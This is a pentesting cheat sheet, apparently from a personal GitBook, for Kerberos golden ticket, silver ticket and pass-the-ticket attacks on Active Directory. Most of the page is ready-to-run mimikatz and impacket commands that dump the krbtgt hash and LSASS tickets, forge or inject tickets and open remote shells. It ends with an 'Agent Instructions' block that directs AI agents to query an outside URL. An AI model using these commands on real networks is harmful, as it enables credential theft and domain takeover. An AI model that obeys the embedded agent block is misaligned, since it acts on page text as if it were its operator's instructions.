# golden silver passing ticket

* **Silver ticket** is more stealth and discreet; only for target service
* **Golden ticket** works for any kerberos service

**Description of terms:**

* **TGT:** ticket to a service account issued by the KDC and can only access that service.
* **KRBTGT:** service account in KDC; issues all TGTs. If possible to impersonate this account and create a golden ticket, we have ability to create a service ticket for any service

## Golden Ticket

### using mimikatz

```bash
# dump hash and SID
lsadump::lsa /inject /name: krbtgt

# create ticket golden
kerberos::golden /user:Administrator /domain:DOMAIN /sid:SID /krbtgt:KRBTGT_NTLM_HASH /id:500

# open a new elevated command prompt with the given ticket in mimikatz.
misc::cmd
```

### using impacket

```bash
impacket-ticketer -nthash KRBTGT_NTLM_HASH -domain-sid DOMAIN_SID -domain FQDN_DOMAIN USERNAME
export KRB5CCNAME=FILE.cache
impacket-psexec DOMAIN/USER@DOMAIN -k -no-pass
# can try impacket-secretsdump
```

## Silver Ticket

### mimikatz

```bash
# dump
lsadump::lsa /inject /name: [<domain-admin-account> | <service-account>]

# create ticket silver
kerberos::golden /user:<USER> /domain:DOMAINM /sid:SID /krbtgt:SERVICE_NTLM_hash /id:1103
misc::cmd
```

## Pass-the-ticket

* Can be used for dumping user credentials inside an AD network
* Can dump the TGT from the LSASS memory (which stores Kerberos ticket as the gatekeeper and accept or reject the credentials provided)
* Gives a .kirbi ticket - can be used to get domain admin
* Allows to escalate to domain admin if you dump a domain admin's ticket and then impersonate that ticket

### using mimikatz

```bash
# exports all .kirbi to current directory
sekurlsa::tickets /export

# find some admin .kirbi from krbtgt
kerberos::ptt TICKET

# to check if ticket is working
> klist
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kashz.gitbook.io/kashz-jewels/active-directory/golden-silver-passing-ticket.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.